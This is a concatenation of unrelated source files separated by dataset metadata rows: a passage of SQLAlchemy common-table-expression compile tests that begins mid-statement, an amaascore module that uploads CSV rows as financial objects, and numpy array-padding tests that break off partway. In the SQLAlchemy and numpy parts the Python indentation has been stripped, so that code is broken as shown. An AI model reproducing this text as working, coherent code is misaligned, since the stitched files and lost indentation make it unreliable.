"AS (SELECT parts.sub_part AS sub_part, parts.part "
"AS part, parts.quantity AS quantity FROM parts "
"WHERE parts.part = :part_1 UNION "
"SELECT parts_1.sub_part AS sub_part, "
"parts_1.part AS part, parts_1.quantity "
"AS quantity FROM parts AS parts_1, anon_1 AS anon_2 "
"WHERE parts_1.part = anon_2.sub_part) "
"SELECT anon_1.sub_part, "
"sum(anon_1.quantity) AS total_quantity FROM anon_1 "
"JOIN parts ON anon_1.part = parts.part "
"GROUP BY anon_1.sub_part", dialect=mssql.dialect())
def test_recursive_union_no_alias_one(self):
s1 = select([literal(0).label("x")])
cte = s1.cte(name="cte", recursive=True)
cte = cte.union_all(
select([cte.c.x + 1]).where(cte.c.x < 10)
)
s2 = select([cte])
self.assert_compile(s2,
"WITH RECURSIVE cte(x) AS "
"(SELECT :param_1 AS x UNION ALL "
"SELECT cte.x + :x_1 AS anon_1 "
"FROM cte WHERE cte.x < :x_2) "
"SELECT cte.x FROM cte"
)
def test_recursive_union_no_alias_two(self):
"""
pg's example:
WITH RECURSIVE t(n) AS (
VALUES (1)
UNION ALL
SELECT n+1 FROM t WHERE n < 100
)
SELECT sum(n) FROM t;
"""
        # I know, this is the PG VALUES keyword,
        # we're cheating here. Also, yes, we need the SELECT;
        # sorry PG.
t = select([func.values(1).label("n")]).cte("t", recursive=True)
t = t.union_all(select([t.c.n + 1]).where(t.c.n < 100))
s = select([func.sum(t.c.n)])
self.assert_compile(s,
"WITH RECURSIVE t(n) AS "
"(SELECT values(:values_1) AS n "
"UNION ALL SELECT t.n + :n_1 AS anon_1 "
"FROM t "
"WHERE t.n < :n_2) "
"SELECT sum(t.n) AS sum_1 FROM t"
)
def test_recursive_union_no_alias_three(self):
# like test one, but let's refer to the CTE
# in a sibling CTE.
s1 = select([literal(0).label("x")])
cte = s1.cte(name="cte", recursive=True)
# can't do it here...
#bar = select([cte]).cte('bar')
cte = cte.union_all(
select([cte.c.x + 1]).where(cte.c.x < 10)
)
bar = select([cte]).cte('bar')
s2 = select([cte, bar])
self.assert_compile(s2,
"WITH RECURSIVE cte(x) AS "
"(SELECT :param_1 AS x UNION ALL "
"SELECT cte.x + :x_1 AS anon_1 "
"FROM cte WHERE cte.x < :x_2), "
"bar AS (SELECT cte.x AS x FROM cte) "
"SELECT cte.x, bar.x FROM cte, bar"
)
def test_recursive_union_no_alias_four(self):
        # like tests one and three, but let's refer to the
        # previous version of "cte". Here we test
        # how the compiler resolves multiple instances
        # of "cte".
s1 = select([literal(0).label("x")])
cte = s1.cte(name="cte", recursive=True)
bar = select([cte]).cte('bar')
cte = cte.union_all(
select([cte.c.x + 1]).where(cte.c.x < 10)
)
# outer cte rendered first, then bar, which
# includes "inner" cte
s2 = select([cte, bar])
self.assert_compile(s2,
"WITH RECURSIVE cte(x) AS "
"(SELECT :param_1 AS x UNION ALL "
"SELECT cte.x + :x_1 AS anon_1 "
"FROM cte WHERE cte.x < :x_2), "
"bar AS (SELECT cte.x AS x FROM cte) "
"SELECT cte.x, bar.x FROM cte, bar"
)
# bar rendered, only includes "inner" cte,
# "outer" cte isn't present
s2 = select([bar])
self.assert_compile(s2,
"WITH RECURSIVE cte(x) AS "
"(SELECT :param_1 AS x), "
"bar AS (SELECT cte.x AS x FROM cte) "
"SELECT bar.x FROM bar"
)
# bar rendered, but then the "outer"
# cte is rendered.
s2 = select([bar, cte])
self.assert_compile(
s2, "WITH RECURSIVE bar AS (SELECT cte.x AS x FROM cte), "
"cte(x) AS "
"(SELECT :param_1 AS x UNION ALL "
"SELECT cte.x + :x_1 AS anon_1 "
"FROM cte WHERE cte.x < :x_2) "
"SELECT bar.x, cte.x FROM bar, cte")
def test_conflicting_names(self):
"""test a flat out name conflict."""
s1 = select([1])
c1 = s1.cte(name='cte1', recursive=True)
s2 = select([1])
c2 = s2.cte(name='cte1', recursive=True)
s = select([c1, c2])
assert_raises_message(
CompileError,
"Multiple, unrelated CTEs found "
"with the same name: 'cte1'",
s.compile
)
def test_union(self):
orders = table('orders',
column('region'),
column('amount'),
)
regional_sales = select([
orders.c.region,
orders.c.amount
]).cte("regional_sales")
s = select(
[regional_sales.c.region]).where(
regional_sales.c.amount > 500
)
self.assert_compile(s,
"WITH regional_sales AS "
"(SELECT orders.region AS region, "
"orders.amount AS amount FROM orders) "
"SELECT regional_sales.region "
"FROM regional_sales WHERE "
"regional_sales.amount > :amount_1")
s = s.union_all(
select([regional_sales.c.region]).
where(
regional_sales.c.amount < 300
)
)
self.assert_compile(s,
"WITH regional_sales AS "
"(SELECT orders.region AS region, "
"orders.amount AS amount FROM orders) "
"SELECT regional_sales.region FROM regional_sales "
"WHERE regional_sales.amount > :amount_1 "
"UNION ALL SELECT regional_sales.region "
"FROM regional_sales WHERE "
"regional_sales.amount < :amount_2")
def test_reserved_quote(self):
orders = table('orders',
column('order'),
)
s = select([orders.c.order]).cte("regional_sales", recursive=True)
s = select([s.c.order])
self.assert_compile(s,
'WITH RECURSIVE regional_sales("order") AS '
'(SELECT orders."order" AS "order" '
"FROM orders)"
' SELECT regional_sales."order" '
"FROM regional_sales"
)
def test_multi_subq_quote(self):
cte = select([literal(1).label("id")]).cte(name='CTE')
s1 = select([cte.c.id]).alias()
s2 = select([cte.c.id]).alias()
s = select([s1, s2])
self.assert_compile(
s,
'WITH "CTE" AS (SELECT :param_1 AS id) '
'SELECT anon_1.id, anon_2.id FROM '
'(SELECT "CTE".id AS id FROM "CTE") AS anon_1, '
'(SELECT "CTE".id AS id FROM "CTE") AS anon_2'
)
def test_positional_binds(self):
orders = table('orders',
column('order'),
)
s = select([orders.c.order, literal("x")]).cte("regional_sales")
s = select([s.c.order, literal("y")])
dialect = default.DefaultDialect()
dialect.positional = True
dialect.paramstyle = 'numeric'
self.assert_compile(
s,
'WITH regional_sales AS (SELECT orders."order" '
'AS "order", :1 AS anon_2 FROM orders) SELECT '
'regional_sales."order", :2 AS anon_1 FROM regional_sales',
checkpositional=(
'x',
'y'),
dialect=dialect)
self.assert_compile(
s.union(s), 'WITH regional_sales AS (SELECT orders."order" '
'AS "order", :1 AS anon_2 FROM orders) SELECT '
'regional_sales."order", :2 AS anon_1 FROM regional_sales '
'UNION SELECT regional_sales."order", :3 AS anon_1 '
'FROM regional_sales', checkpositional=(
'x', 'y', 'y'), dialect=dialect)
s = select([orders.c.order]).\
where(orders.c.order == 'x').cte("regional_sales")
s = select([s.c.order]).where(s.c.order == "y")
self.assert_compile(
s, 'WITH regional_sales AS (SELECT orders."order" AS '
'"order" FROM orders WHERE orders."order" = :1) '
'SELECT regional_sales."order" FROM regional_sales '
'WHERE regional_sales."order" = :2', checkpositional=(
'x', 'y'), dialect=dialect)
def test_positional_binds_2(self):
orders = table('orders',
column('order'),
)
s = select([orders.c.order, literal("x")]).cte("regional_sales")
s = select([s.c.order, literal("y")])
dialect = default.DefaultDialect()
dialect.positional = True
dialect.paramstyle = 'numeric'
s1 = select([orders.c.order]).where(orders.c.order == 'x').\
cte("regional_sales_1")
s1a = s1.alias()
s2 = select([orders.c.order == 'y', s1a.c.order,
orders.c.order, s1.c.order]).\
where(orders.c.order == 'z').\
cte("regional_sales_2")
s3 = select([s2])
self.assert_compile(
s3,
'WITH regional_sales_1 AS (SELECT orders."order" AS "order" '
'FROM orders WHERE orders."order" = :1), regional_sales_2 AS '
'(SELECT orders."order" = :2 AS anon_1, '
'anon_2."order" AS "order", '
'orders."order" AS "order", '
'regional_sales_1."order" AS "order" FROM orders, '
'regional_sales_1 '
'AS anon_2, regional_sales_1 '
'WHERE orders."order" = :3) SELECT regional_sales_2.anon_1, '
'regional_sales_2."order" FROM regional_sales_2',
checkpositional=('x', 'y', 'z'), dialect=dialect)
def test_positional_binds_2_asliteral(self):
orders = table('orders',
column('order'),
)
s = select([orders.c.order, literal("x")]).cte("regional_sales")
s = select([s.c.order, literal("y")])
dialect = default.DefaultDialect()
dialect.positional = True
dialect.paramstyle = 'numeric'
s1 = select([orders.c.order]).where(orders.c.order == 'x').\
cte("regional_sales_1")
s1a = s1.alias()
s2 = select([orders.c.order == 'y', s1a.c.order,
orders.c.order, s1.c.order]).\
where(orders.c.order == 'z').\
cte("regional_sales_2")
s3 = select([s2])
self.assert_compile(
s3,
'WITH regional_sales_1 AS '
'(SELECT orders."order" AS "order" '
'FROM orders '
'WHERE orders."order" = \'x\'), '
'regional_sales_2 AS '
'(SELECT orders."order" = \'y\' AS anon_1, '
'anon_2."order" AS "order", orders."order" AS "order", '
'regional_sales_1."order" AS "order" '
'FROM orders, regional_sales_1 AS anon_2, regional_sales_1 '
'WHERE orders."order" = \'z\') '
'SELECT regional_sales_2.anon_1, regional_sales_2."order" '
'FROM regional_sales_2',
checkpositional=(), dialect=dialect,
literal_binds=True)
def test_all_aliases(self):
orders = table('order', column('order'))
s = select([orders.c.order]).cte("regional_sales")
r1 = s.alias()
r2 = s.alias()
s2 = select([r1, r2]).where(r1.c.order > r2.c.order)
self.assert_compile(
s2,
'WITH regional_sales AS (SELECT "order"."order" '
'AS "order" FROM "order") '
'SELECT anon_1."order", anon_2."order" '
'FROM regional_sales AS anon_1, '
'regional_sales AS anon_2 WHERE anon_1."order" > anon_2."order"'
)
s3 = select(
[orders]).select_from(
orders.join(
r1,
r1.c.order == orders.c.order))
self.assert_compile(
s3,
'WITH regional_sales AS '
'(SELECT "order"."order" AS "order" '
'FROM "order")'
' SELECT "order"."order" '
'FROM "order" JOIN regional_sales AS anon_1 '
'ON anon_1."order" = "order"."order"'
)
def test_suffixes(self):
orders = table('order', column('order'))
s = select([orders.c.order]).cte("regional_sales")
s = s.suffix_with("pg suffix", dialect='postgresql')
s = s.suffix_with('oracle suffix', dialect='oracle')
stmt = select([orders]).where(orders.c.order > s.c.order)
self.assert_compile(
stmt,
'WITH regional_sales AS (SELECT "order"."order" AS "order" '
'FROM "order") SELECT "order"."order" FROM "order", '
'regional_sales WHERE "order"."order" > regional_sales."order"'
)
self.assert_compile(
stmt,
'WITH regional_sales AS (SELECT "order"."order" AS "order" '
'FROM "order") oracle suffix SELECT "order"."order" FROM "order", '
'regional_sales WHERE "order"."order" > regional_sales."order"',
dialect='oracle'
)
self.assert_compile(
stmt,
'WITH regional_sales AS (SELECT "order"."order" AS "order" '
'FROM "order") pg suffix SELECT "order"."order" FROM "order", '
'regional_sales WHERE "order"."order" > regional_sales."order"',
dialect='postgresql'
)
| mit | 4,803,992,220,273,365,000 | 37.384615 | 80 | 0.487923 | false |
paul-rs/amaas-core-sdk-python | amaascore/csv_upload/csv_uploader.py | 1 | 4993 | import logging.config
import csv
import json
from amaascore.tools.csv_tools import csv_stream_to_objects
from amaasutils.logging_utils import DEFAULT_LOGGING
from amaascore.csv_upload.utils import process_normal, interface_direct_class, interface_direct_csvpath
from amaascore.assets.asset import Asset
from amaascore.assets.automobile import Automobile
from amaascore.assets.bond import BondCorporate, BondGovernment, BondMortgage
from amaascore.assets.bond_future import BondFuture
from amaascore.assets.bond_future_option import BondFutureOption
from amaascore.assets.bond_option import BondOption
from amaascore.assets.cfd import ContractForDifference
from amaascore.assets.currency import Currency
from amaascore.assets.custom_asset import CustomAsset
from amaascore.assets.derivative import Derivative
from amaascore.assets.energy_future import EnergyFuture
from amaascore.assets.equity import Equity
from amaascore.assets.equity_future import EquityFuture
from amaascore.assets.etf import ExchangeTradedFund
from amaascore.assets.foreign_exchange import ForeignExchange, NonDeliverableForward
from amaascore.assets.fund import Fund
from amaascore.assets.future import Future
from amaascore.assets.future_option import FutureOption
from amaascore.assets.fx_option import ForeignExchangeOption
from amaascore.assets.index import Index
from amaascore.assets.index_future import IndexFuture
from amaascore.assets.interest_rate_future import InterestRateFuture
from amaascore.assets.listed_cfd import ListedContractForDifference
from amaascore.assets.listed_derivative import ListedDerivative
from amaascore.assets.option_mixin import OptionMixin
from amaascore.assets.real_asset import RealAsset
from amaascore.assets.real_estate import RealEstate
from amaascore.assets.sukuk import Sukuk
from amaascore.assets.synthetic import Synthetic
from amaascore.assets.synthetic_from_book import SyntheticFromBook
from amaascore.assets.synthetic_multi_leg import SyntheticMultiLeg
from amaascore.assets.wine import Wine
from amaascore.assets.warrants import Warrant
from amaascore.parties.broker import Broker
from amaascore.parties.company import Company
from amaascore.parties.exchange import Exchange
from amaascore.parties.fund import Fund
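# NOTE: this rebinds the Fund imported from amaascore.assets.fund above, so an
# 'amaasclass' value of 'Fund' resolves to the party class in json_handler below.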
from amaascore.parties.government_agency import GovernmentAgency
from amaascore.parties.individual import Individual
from amaascore.parties.organisation import Organisation
from amaascore.parties.party import Party
from amaascore.parties.sub_fund import SubFund
from amaascore.books.book import Book
from amaascore.corporate_actions.corporate_action import CorporateAction
from amaascore.corporate_actions.dividend import Dividend
from amaascore.corporate_actions.notification import Notification
from amaascore.corporate_actions.split import Split
from amaascore.market_data.eod_price import EODPrice
from amaascore.market_data.fx_rate import FXRate
from amaascore.market_data.quote import Quote
from amaascore.transactions.position import Position
from amaascore.transactions.transaction import Transaction
from amaascore.asset_managers.asset_manager import AssetManager
from amaascore.asset_managers.relationship import Relationship
class Uploader(object):
def __init__(self):
pass
@staticmethod
def json_handler(orderedDict, params):
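        """Build a single AMaaS object from one parsed CSV row: the row is
        merged with params, the 'amaasclass' column selects which of the
        imported classes to construct, and the merged dict is normalised via
        process_normal before being expanded as keyword arguments."""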
Dict = dict(orderedDict)
for key, var in params.items():
            Dict[key] = var
data_class = Dict.get('amaasclass', None)
Dict = process_normal(Dict)
obj = globals()[data_class](**dict(Dict))
return obj
@staticmethod
    def upload(csvpath, asset_manager_id=None, client_id=None):
        """Convert CSV file rows to objects and insert them;
        asset_manager_id and, optionally, client_id come from the UI (login)."""
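        # Illustrative call (the file name and IDs are hypothetical):
        #   Uploader.upload('assets.csv', asset_manager_id=1, client_id=1)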
interface = interface_direct_csvpath(csvpath)
logging.config.dictConfig(DEFAULT_LOGGING)
logger = logging.getLogger(__name__)
if asset_manager_id is None:
params = dict()
elif client_id is None:
params = {'asset_manager_id': asset_manager_id}
else:
params = {'asset_manager_id': asset_manager_id, 'client_id': client_id}
with open(csvpath) as csvfile:
objs = csv_stream_to_objects(stream=csvfile, json_handler=Uploader.json_handler, params=params)
for obj in objs:
interface.new(obj)
                logger.info('Created the object and uploaded it to the database successfully')
@staticmethod
    def download(csvpath, asset_manager_id, data_id_type, data_id_list):
        """Retrieve the objects, mainly for test purposes."""
interface = interface_direct_csvpath(csvpath)
logging.config.dictConfig(DEFAULT_LOGGING)
logger = logging.getLogger(__name__)
objs = []
for data_id in data_id_list:
Dict = dict()
Dict[data_id_type] = data_id
objs.append(interface.retrieve(asset_manager_id=asset_manager_id, **Dict))
return objs | apache-2.0 | 5,323,224,746,094,649,000 | 42.426087 | 107 | 0.775486 | false |
jonyroda97/redbot-amigosprovaveis | lib/numpy/lib/tests/test_arraypad.py | 6 | 43701 | """Tests for the array padding functions.
"""
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import (assert_array_equal, assert_raises, assert_allclose,
TestCase)
from numpy.lib import pad
class TestConditionalShortcuts(TestCase):
def test_zero_padding_shortcuts(self):
test = np.arange(120).reshape(4, 5, 6)
pad_amt = [(0, 0) for axis in test.shape]
modes = ['constant',
'edge',
'linear_ramp',
'maximum',
'mean',
'median',
'minimum',
'reflect',
'symmetric',
'wrap',
]
for mode in modes:
assert_array_equal(test, pad(test, pad_amt, mode=mode))
def test_shallow_statistic_range(self):
test = np.arange(120).reshape(4, 5, 6)
pad_amt = [(1, 1) for axis in test.shape]
modes = ['maximum',
'mean',
'median',
'minimum',
]
for mode in modes:
assert_array_equal(pad(test, pad_amt, mode='edge'),
pad(test, pad_amt, mode=mode, stat_length=1))
def test_clip_statistic_range(self):
test = np.arange(30).reshape(5, 6)
pad_amt = [(3, 3) for axis in test.shape]
modes = ['maximum',
'mean',
'median',
'minimum',
]
for mode in modes:
assert_array_equal(pad(test, pad_amt, mode=mode),
pad(test, pad_amt, mode=mode, stat_length=30))
class TestStatistic(TestCase):
def test_check_mean_stat_length(self):
a = np.arange(100).astype('f')
a = pad(a, ((25, 20), ), 'mean', stat_length=((2, 3), ))
b = np.array(
[0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5,
0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5,
0.5, 0.5, 0.5, 0.5, 0.5,
0., 1., 2., 3., 4., 5., 6., 7., 8., 9.,
10., 11., 12., 13., 14., 15., 16., 17., 18., 19.,
20., 21., 22., 23., 24., 25., 26., 27., 28., 29.,
30., 31., 32., 33., 34., 35., 36., 37., 38., 39.,
40., 41., 42., 43., 44., 45., 46., 47., 48., 49.,
50., 51., 52., 53., 54., 55., 56., 57., 58., 59.,
60., 61., 62., 63., 64., 65., 66., 67., 68., 69.,
70., 71., 72., 73., 74., 75., 76., 77., 78., 79.,
80., 81., 82., 83., 84., 85., 86., 87., 88., 89.,
90., 91., 92., 93., 94., 95., 96., 97., 98., 99.,
98., 98., 98., 98., 98., 98., 98., 98., 98., 98.,
98., 98., 98., 98., 98., 98., 98., 98., 98., 98.
])
assert_array_equal(a, b)
def test_check_maximum_1(self):
a = np.arange(100)
a = pad(a, (25, 20), 'maximum')
b = np.array(
[99, 99, 99, 99, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
99, 99, 99, 99, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99, 99, 99, 99, 99, 99]
)
assert_array_equal(a, b)
def test_check_maximum_2(self):
a = np.arange(100) + 1
a = pad(a, (25, 20), 'maximum')
b = np.array(
[100, 100, 100, 100, 100, 100, 100, 100, 100, 100,
100, 100, 100, 100, 100, 100, 100, 100, 100, 100,
100, 100, 100, 100, 100,
1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50,
51, 52, 53, 54, 55, 56, 57, 58, 59, 60,
61, 62, 63, 64, 65, 66, 67, 68, 69, 70,
71, 72, 73, 74, 75, 76, 77, 78, 79, 80,
81, 82, 83, 84, 85, 86, 87, 88, 89, 90,
91, 92, 93, 94, 95, 96, 97, 98, 99, 100,
100, 100, 100, 100, 100, 100, 100, 100, 100, 100,
100, 100, 100, 100, 100, 100, 100, 100, 100, 100]
)
assert_array_equal(a, b)
def test_check_maximum_stat_length(self):
a = np.arange(100) + 1
a = pad(a, (25, 20), 'maximum', stat_length=10)
b = np.array(
[10, 10, 10, 10, 10, 10, 10, 10, 10, 10,
10, 10, 10, 10, 10, 10, 10, 10, 10, 10,
10, 10, 10, 10, 10,
1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50,
51, 52, 53, 54, 55, 56, 57, 58, 59, 60,
61, 62, 63, 64, 65, 66, 67, 68, 69, 70,
71, 72, 73, 74, 75, 76, 77, 78, 79, 80,
81, 82, 83, 84, 85, 86, 87, 88, 89, 90,
91, 92, 93, 94, 95, 96, 97, 98, 99, 100,
100, 100, 100, 100, 100, 100, 100, 100, 100, 100,
100, 100, 100, 100, 100, 100, 100, 100, 100, 100]
)
assert_array_equal(a, b)
def test_check_minimum_1(self):
a = np.arange(100)
a = pad(a, (25, 20), 'minimum')
b = np.array(
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
)
assert_array_equal(a, b)
def test_check_minimum_2(self):
a = np.arange(100) + 2
a = pad(a, (25, 20), 'minimum')
b = np.array(
[2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2,
2, 3, 4, 5, 6, 7, 8, 9, 10, 11,
12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
22, 23, 24, 25, 26, 27, 28, 29, 30, 31,
32, 33, 34, 35, 36, 37, 38, 39, 40, 41,
42, 43, 44, 45, 46, 47, 48, 49, 50, 51,
52, 53, 54, 55, 56, 57, 58, 59, 60, 61,
62, 63, 64, 65, 66, 67, 68, 69, 70, 71,
72, 73, 74, 75, 76, 77, 78, 79, 80, 81,
82, 83, 84, 85, 86, 87, 88, 89, 90, 91,
92, 93, 94, 95, 96, 97, 98, 99, 100, 101,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2]
)
assert_array_equal(a, b)
def test_check_minimum_stat_length(self):
a = np.arange(100) + 1
a = pad(a, (25, 20), 'minimum', stat_length=10)
b = np.array(
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1,
1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50,
51, 52, 53, 54, 55, 56, 57, 58, 59, 60,
61, 62, 63, 64, 65, 66, 67, 68, 69, 70,
71, 72, 73, 74, 75, 76, 77, 78, 79, 80,
81, 82, 83, 84, 85, 86, 87, 88, 89, 90,
91, 92, 93, 94, 95, 96, 97, 98, 99, 100,
91, 91, 91, 91, 91, 91, 91, 91, 91, 91,
91, 91, 91, 91, 91, 91, 91, 91, 91, 91]
)
assert_array_equal(a, b)
def test_check_median(self):
a = np.arange(100).astype('f')
a = pad(a, (25, 20), 'median')
b = np.array(
[49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
49.5, 49.5, 49.5, 49.5, 49.5,
0., 1., 2., 3., 4., 5., 6., 7., 8., 9.,
10., 11., 12., 13., 14., 15., 16., 17., 18., 19.,
20., 21., 22., 23., 24., 25., 26., 27., 28., 29.,
30., 31., 32., 33., 34., 35., 36., 37., 38., 39.,
40., 41., 42., 43., 44., 45., 46., 47., 48., 49.,
50., 51., 52., 53., 54., 55., 56., 57., 58., 59.,
60., 61., 62., 63., 64., 65., 66., 67., 68., 69.,
70., 71., 72., 73., 74., 75., 76., 77., 78., 79.,
80., 81., 82., 83., 84., 85., 86., 87., 88., 89.,
90., 91., 92., 93., 94., 95., 96., 97., 98., 99.,
49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5]
)
assert_array_equal(a, b)
def test_check_median_01(self):
a = np.array([[3, 1, 4], [4, 5, 9], [9, 8, 2]])
a = pad(a, 1, 'median')
b = np.array(
[[4, 4, 5, 4, 4],
[3, 3, 1, 4, 3],
[5, 4, 5, 9, 5],
[8, 9, 8, 2, 8],
[4, 4, 5, 4, 4]]
)
assert_array_equal(a, b)
def test_check_median_02(self):
a = np.array([[3, 1, 4], [4, 5, 9], [9, 8, 2]])
a = pad(a.T, 1, 'median').T
b = np.array(
[[5, 4, 5, 4, 5],
[3, 3, 1, 4, 3],
[5, 4, 5, 9, 5],
[8, 9, 8, 2, 8],
[5, 4, 5, 4, 5]]
)
assert_array_equal(a, b)
def test_check_median_stat_length(self):
a = np.arange(100).astype('f')
a[1] = 2.
a[97] = 96.
a = pad(a, (25, 20), 'median', stat_length=(3, 5))
b = np.array(
[ 2., 2., 2., 2., 2., 2., 2., 2., 2., 2.,
2., 2., 2., 2., 2., 2., 2., 2., 2., 2.,
2., 2., 2., 2., 2.,
0., 2., 2., 3., 4., 5., 6., 7., 8., 9.,
10., 11., 12., 13., 14., 15., 16., 17., 18., 19.,
20., 21., 22., 23., 24., 25., 26., 27., 28., 29.,
30., 31., 32., 33., 34., 35., 36., 37., 38., 39.,
40., 41., 42., 43., 44., 45., 46., 47., 48., 49.,
50., 51., 52., 53., 54., 55., 56., 57., 58., 59.,
60., 61., 62., 63., 64., 65., 66., 67., 68., 69.,
70., 71., 72., 73., 74., 75., 76., 77., 78., 79.,
80., 81., 82., 83., 84., 85., 86., 87., 88., 89.,
90., 91., 92., 93., 94., 95., 96., 96., 98., 99.,
96., 96., 96., 96., 96., 96., 96., 96., 96., 96.,
96., 96., 96., 96., 96., 96., 96., 96., 96., 96.]
)
assert_array_equal(a, b)
def test_check_mean_shape_one(self):
a = [[4, 5, 6]]
a = pad(a, (5, 7), 'mean', stat_length=2)
b = np.array(
[[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6]]
)
assert_array_equal(a, b)
def test_check_mean_2(self):
a = np.arange(100).astype('f')
a = pad(a, (25, 20), 'mean')
b = np.array(
[49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
49.5, 49.5, 49.5, 49.5, 49.5,
0., 1., 2., 3., 4., 5., 6., 7., 8., 9.,
10., 11., 12., 13., 14., 15., 16., 17., 18., 19.,
20., 21., 22., 23., 24., 25., 26., 27., 28., 29.,
30., 31., 32., 33., 34., 35., 36., 37., 38., 39.,
40., 41., 42., 43., 44., 45., 46., 47., 48., 49.,
50., 51., 52., 53., 54., 55., 56., 57., 58., 59.,
60., 61., 62., 63., 64., 65., 66., 67., 68., 69.,
70., 71., 72., 73., 74., 75., 76., 77., 78., 79.,
80., 81., 82., 83., 84., 85., 86., 87., 88., 89.,
90., 91., 92., 93., 94., 95., 96., 97., 98., 99.,
49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5]
)
assert_array_equal(a, b)
class TestConstant(TestCase):
def test_check_constant(self):
a = np.arange(100)
a = pad(a, (25, 20), 'constant', constant_values=(10, 20))
b = np.array(
[10, 10, 10, 10, 10, 10, 10, 10, 10, 10,
10, 10, 10, 10, 10, 10, 10, 10, 10, 10,
10, 10, 10, 10, 10,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
20, 20, 20, 20, 20, 20, 20, 20, 20, 20,
20, 20, 20, 20, 20, 20, 20, 20, 20, 20]
)
assert_array_equal(a, b)
